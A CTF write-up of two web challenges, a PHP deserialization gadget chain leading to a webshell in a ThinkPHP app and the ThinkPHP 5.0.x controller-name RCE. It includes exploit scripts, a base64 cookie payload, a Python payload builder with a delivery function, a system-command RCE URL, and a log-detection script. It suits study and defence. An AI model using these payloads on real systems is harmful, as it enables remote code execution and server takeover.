I only got to look at this after my exams, so I did not contribute much.
My teammates are far too strong.

I only worked on web, so I will write up the challenges I solved and leave the rest out. Reproductions of the others will be added later.

Web

upload

Register and log in. There is a file upload; testing shows that only images are accepted and that only the file header (magic bytes) is checked.
Take any image, append PHP webshell code after the image data, and upload it. The trailing PHP survives because nothing beyond the header is inspected.
The image lands in the /upload/da5703ef349c8b4ca65880a05514ff89/ directory.

Directory scanning turns up //www.tar.gz, which contains the source code.

Next, audit the source: the application is built on ThinkPHP.
Following the TP5 directory layout, the code to audit is under tp5\application\web\controller.

//Index.php

public function login_check(){
    $profile=cookie('user');
    if(!empty($profile)){
        // user-controlled cookie value goes straight into unserialize()
        $this->profile=unserialize(base64_decode($profile));
        $this->profile_db=db('user')->where("ID",intval($this->profile['ID']))->find();
        if(array_diff($this->profile_db,$this->profile)==null){
            return 1;
        }else{
            return 0;
        }
    }
}

This is a deserialization sink: the user cookie is base64-decoded and passed to unserialize() with no integrity check, so any class reachable in the application can be instantiated with attacker-chosen properties.

Now look for exploitable classes. Register has a __destruct() method that calls $this->checker->index() whenever registed is false:

//Register.php

public function __destruct()
{
    if(!$this->registed){
        // $checker is attacker-controlled after unserialize(): any object can go here
        $this->checker->index();
    }
}

Profile has a __call() method, and an upload_img() method that __call() can reach:

//Profile.php

public function upload_img(){
    if($this->checker){
        if(!$this->checker->login_check()){
            $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
            $this->redirect($curr_url,302);
            exit();
        }
    }
    if(!empty($_FILES)){
        $this->filename_tmp=$_FILES['upload_file']['tmp_name'];
        $this->filename=md5($_FILES['upload_file']['name']).".png";
        $this->ext_check();
    }
    if($this->ext) {
        // only the source is validated as an image; the destination name is copied as-is
        if(getimagesize($this->filename_tmp)) {
            @copy($this->filename_tmp, $this->filename);
            @unlink($this->filename_tmp);
            $this->img="../upload/$this->upload_menu/$this->filename";
            $this->update_img();
        }else{
            $this->error('Forbidden type!', url('../index'));
        }
    }else{
        $this->error('Unknow file type!', url('../index'));
    }
}

public function __call($name, $arguments)
{
    // for an undefined method $name, call the method whose name is stored in $this->$name
    if($this->{$name}){
        $this->{$this->{$name}}($arguments);
    }
}

__call() fires for any undefined method name $name, reads the property $this->{$name}, and calls the method named by its value, so it can dispatch to any method of Profile: with index = "upload_img", the call $checker->index() from Register's destructor becomes $this->upload_img(). Inside upload_img(), when the request carries no file ($_FILES is empty), filename_tmp and filename keep whatever values were deserialized, and copy() moves filename_tmp to filename with no check on the destination extension; the only requirement is that getimagesize() succeeds on the source, which the image with PHP appended satisfies. To reach that branch, set ext to true and leave checker null (or false) so login_check() is never called.

Exploitation plan:
Deserialize a Register whose checker points to a Profile object. When the Register is destructed it calls $checker->index(), which hits Profile's __call(); that dispatches to upload_img(), which copies the previously uploaded image webshell to a .php filename, giving a shell.

EXP:

<?php
// Namespace must match the application's controllers so unserialize() resolves the classes.
namespace app\web\controller;

// Minimal stand-ins: only the property names matter for serialization.
class Register
{
    public $checker;
    public $registed;
}

class Profile
{
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;
    public $index;
}

class Index
{
    public $profile;
    public $profile_db;
}

$obj = new Register();
$obj->checker = new Profile();   // checker on the Profile itself stays null, so login_check() is skipped
$obj->registed = false;          // __destruct() only calls $checker->index() when this is false

// the image webshell uploaded earlier
//http://117.78.28.89:31424/upload/da5703ef349c8b4ca65880a05514ff89/156005c5baf40ff51a327f1c34f2975b.png
$obj->checker->index = "upload_img";   // __call('index') -> upload_img()
$obj->checker->ext= true;              // take the copy() branch
$obj->checker->upload_menu="da5703ef349c8b4ca65880a05514ff89";
// paths, relative to the PHP working directory (../public/... resolved correctly on this target)
$obj->checker->filename_tmp="../public/upload/da5703ef349c8b4ca65880a05514ff89/156005c5baf40ff51a327f1c34f2975b.png";
$obj->checker->filename="../public/upload/da5703ef349c8b4ca65880a05514ff89/shell.php";

$payload = base64_encode(serialize($obj));
echo $payload."\n";

Printed payload. Note that this particular string came from a later run with filename_tmp = .../shell.php and filename = .../jingzhe.php (renaming the shell once more), not from the values in the script above; regenerate it for your own directory and file names:

TzoyNzoiYXBwXHdlYlxjb250cm9sbGVyXFJlZ2lzdGVyIjoyOntzOjc6ImNoZWNrZXIiO086MjY6ImFwcFx3ZWJcY29udHJvbGxlclxQcm9maWxlIjo4OntzOjc6ImNoZWNrZXIiO047czoxMjoiZmlsZW5hbWVfdG1wIjtzOjU5OiIuLi9wdWJsaWMvdXBsb2FkL2RhNTcwM2VmMzQ5YzhiNGNhNjU4ODBhMDU1MTRmZjg5L3NoZWxsLnBocCI7czo4OiJmaWxlbmFtZSI7czo2MToiLi4vcHVibGljL3VwbG9hZC9kYTU3MDNlZjM0OWM4YjRjYTY1ODgwYTA1NTE0ZmY4OS9qaW5nemhlLnBocCI7czoxMToidXBsb2FkX21lbnUiO3M6MzI6ImRhNTcwM2VmMzQ5YzhiNGNhNjU4ODBhMDU1MTRmZjg5IjtzOjM6ImV4dCI7YjoxO3M6MzoiaW1nIjtOO3M6NjoiZXhjZXB0IjtOO3M6NToiaW5kZXgiO3M6MTA6InVwbG9hZF9pbWciO31zOjg6InJlZ2lzdGVkIjtiOjA7fQ==

Set the payload as the user cookie and request an action that runs login_check(); the destructor then performs the copy. Connect to the resulting .php file with AntSword and cat /flag.
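The same payload can be produced without a PHP interpreter. The script below is an added example, not part of the original writeup or of the challenge code: it hand-writes the PHP serialize() wire format that the PHP EXP above produces, so the gadget chain's properties (and their order, which PHP emits in declaration order) are visible rather than hidden in a base64 blob. The upload directory and file names are taken from the writeup; the delivery route /index.php/index/index and the plain cookie name user are assumptions, since the writeup does not say which action it requested.

```python
import base64
import urllib.request
from urllib.parse import quote


def php_serialize(value):
    """Emit PHP serialize() syntax for None, bool, int, str, dict (array)
    and objects given as (class_name, {property: value}) tuples.  Property
    order is preserved: PHP writes properties in declaration order, and the
    output must be byte-exact for unserialize() to rebuild the objects."""
    if value is None:
        return "N;"
    if isinstance(value, bool):            # before int: bool is an int subclass
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, tuple) and len(value) == 2:
        cls, props = value
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(cls), cls, len(props), body)
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type: %r" % type(value))


def build_payload(upload_dir, src_name, dst_name):
    """Register -> Profile chain from the writeup: Register::__destruct() calls
    $checker->index(), Profile::__call() maps 'index' to upload_img(), and
    upload_img() copies filename_tmp to filename with no extension check."""
    base = "../public/upload/%s/" % upload_dir
    profile = ("app\\web\\controller\\Profile", {
        "checker": None,                  # falsy: login_check() is never reached
        "filename_tmp": base + src_name,  # image with PHP appended; passes getimagesize()
        "filename": base + dst_name,      # copy target, so any extension we like
        "upload_menu": upload_dir,
        "ext": True,                      # avoids the "Unknow file type!" branch
        "img": None,
        "except": None,
        "index": "upload_img",            # __call('index') -> $this->upload_img()
    })
    register = ("app\\web\\controller\\Register", {
        "checker": profile,
        "registed": False,                # __destruct() only fires the call when false
    })
    return base64.b64encode(php_serialize(register).encode("utf-8")).decode("ascii")


def deliver(base_url, payload, path="/index.php/index/index"):
    """Send the cookie to an action that runs login_check().  Assumption: the
    route and the unprefixed cookie name 'user' are guesses; point this at
    whatever action on the target calls login_check()."""
    req = urllib.request.Request(
        base_url.rstrip("/") + path,
        headers={"Cookie": "user=" + quote(payload, safe="")},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


if __name__ == "__main__":
    upload_dir = "da5703ef349c8b4ca65880a05514ff89"   # per-user directory from the writeup
    payload = build_payload(upload_dir, "156005c5baf40ff51a327f1c34f2975b.png", "shell.php")
    print(payload)
    # deliver("http://117.78.28.89:31424", payload)   # then open /upload/<dir>/shell.php
```

With the file names from the printed payload (shell.php renamed to jingzhe.php) the function reproduces that base64 string exactly, which is a convenient check that the serializer is byte-accurate before pointing it at a target.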

Flag:

flag{ce5cb05ff4af0881a044f1d79f59ad2e}

强网先锋-上单 (QWB Vanguard - Top Lane)

One look shows it is ThinkPHP, with the version number 5.0.22 exposed, which recalls the ThinkPHP 5 RCE disclosed last year: the controller name taken from the route is not validated, so a backslash in it lets a request reach arbitrary framework classes such as think\app and call invokefunction with attacker-chosen arguments.

thinkphp5 RCE
https://paper.seebug.org/770/

payload:

http://117.78.28.89:32422/1/public/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

Flag:

flag{9cdb595d4de827acde9b45bb120615d6}
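For the defensive side of both challenges, the following is an added example (not from the writeup or from ThinkPHP): detection logic for the two indicators on this page, run over constructed access-log lines. It flags any ThinkPHP route (from PATH_INFO or the ?s= parameter, URL-decoded) that contains a backslash, since a legitimate controller name never escapes the application namespace, plus the invokefunction / call_user_func reflective-call tokens, and separately checks whether a cookie value is base64 of a PHP serialized object, the shape login_check() feeds into unserialize(). The log lines and IPs are made up; the first reuses the route from the payload above and the third shows the same primitive with encoded backslashes reaching a different framework class.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format), not real traffic.
LOG_LINES = [
    r'10.0.0.5 - - [25/May/2019:10:01:02 +0800] "GET /1/public/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag HTTP/1.1" 200 512',
    r'10.0.0.6 - - [25/May/2019:10:01:03 +0800] "GET /1/public/?s=index/index/index HTTP/1.1" 200 1024',
    r'10.0.0.7 - - [25/May/2019:10:01:04 +0800] "GET /index.php?s=/index/%5cthink%5cContainer/invokefunction&function=phpinfo&vars[0]=1 HTTP/1.1" 500 0',
    r'10.0.0.8 - - [25/May/2019:10:01:05 +0800] "GET /upload/da5703ef349c8b4ca65880a05514ff89/156005c5baf40ff51a327f1c34f2975b.png HTTP/1.1" 200 4096',
]

REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/')
PHP_OBJECT_RE = re.compile(rb'^O:\d+:"')


def route_candidates(url):
    """Every place ThinkPHP 5 may read module/controller/action from: the
    path (PATH_INFO style) and the ?s= parameter, both URL-decoded, so an
    encoded %5c is treated the same as a literal backslash."""
    parts = urlsplit(url)
    cands = [unquote(parts.path)]
    cands += [unquote(v) for v in parse_qs(parts.query, keep_blank_values=True).get("s", [])]
    return cands


def classify_request(url):
    """Reasons a request looks like the 5.0.x controller-name RCE, or [] if clean."""
    reasons = []
    if any("\\" in c for c in route_candidates(url)):
        reasons.append("backslash in route: controller name escapes the app namespace")
    decoded = unquote(url).lower()
    for token in ("invokefunction", "call_user_func"):
        if token in decoded:
            reasons.append("reflective call primitive: " + token)
    return reasons


def cookie_carries_php_object(value):
    """True when a cookie value is base64 of a PHP serialized object, i.e. a
    candidate for the unserialize() sink in the upload challenge."""
    try:
        raw = base64.b64decode(unquote(value), validate=True)
    except ValueError:            # binascii.Error is a ValueError subclass
        return False
    return PHP_OBJECT_RE.match(raw) is not None


def scan_access_log(lines):
    """Return (client_ip, url, reasons) for each suspicious request line."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        ip, url = m.groups()
        reasons = classify_request(url)
        if reasons:
            hits.append((ip, url, reasons))
    return hits


if __name__ == "__main__":
    for ip, url, reasons in scan_access_log(LOG_LINES):
        print(ip, url, "; ".join(reasons))
```

The backslash rule is the robust one: the reflective-call tokens are easy to vary, but any exploitation of the unvalidated controller name needs a namespace separator in the route, and checking it after URL-decoding defeats the %5c encoding seen in the third line.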